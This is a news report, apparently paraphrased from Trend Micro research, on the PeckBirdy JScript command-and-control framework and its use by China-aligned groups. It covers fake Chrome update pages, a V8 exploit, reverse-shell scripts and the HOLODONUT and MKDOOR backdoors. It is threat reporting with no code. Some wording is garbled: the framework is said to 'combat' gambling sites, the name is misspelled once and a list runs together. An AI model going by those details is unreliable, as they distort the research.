Cybersecurity researchers have found that China-aligned APT actors have been using PeckBirdy, a JScript-based command-and-control (C2) framework, to target various environments since 2023. According to Trend Micro, the adaptable framework has been used to combat Chinese gambling industries and malicious activities that target Asian governments and private organizations. According to researchers Ted Lee and Joseph C. Chen, "PeckBirdy is a script-based framework which, while possessing advanced capabilities, is implemented using JScript, an old script language."

"This is to guarantee that the framework could be launched via LOLBins (living-off-the-land binaries) across various execution environments." The cybersecurity firm claimed to have discovered the PeckBirdy script framework in 2023 after seeing malicious scripts being injected into several Chinese gambling websites. These scripts are intended to download and run the main payload in order to enable the remote delivery and execution of JavaScript.

This routine's ultimate objective is to present phony Google Chrome software update webpages in order to deceive users into downloading and executing phony update files, thereby infecting computers with malware.

An exploitation script for a Google Chrome vulnerability in the V8 engine (CVE-2020-16040, CVSS score: 6.5) that was fixed in December 2020 was discovered to be hosted on one of PeckBirdy's servers connected to the SHADOW-VOID-044 campaign. Social engineering pop-up scripts that deceive victims into downloading and running malicious files Backdoor delivery scripts that use Electron JS Scripts to create reverse shells over TCP sockets Two backdoors, HOLODONUT and MKDOOR, were discovered as a result of additional infrastructure analysis. HOLODONUT is a.NET-based modular backdoor that can load, run, or remove various plugins obtained from the server.

MKDOOR is a modular backdoor that can load, executing or removing various modules that were obtained from the server SHADOW-VOID-044 and SHADOW-EARTH-045 may be connected to various nation-state actors with ties to China.

The following hints served as the basis for this evaluation: "These campaigns make use of a dynamic JavaScript framework, PickBirdy, to abuse living-off-the-land binaries and deliver modular backdoors such as MKDOOR and HOLODONUT," Trend Micro concluded.Because malicious JavaScript frameworks use dynamically generated, runtime-injected code and lack persistent file artifacts, which allow them to circumvent conventional endpoint security controls, detecting them is still a major challenge.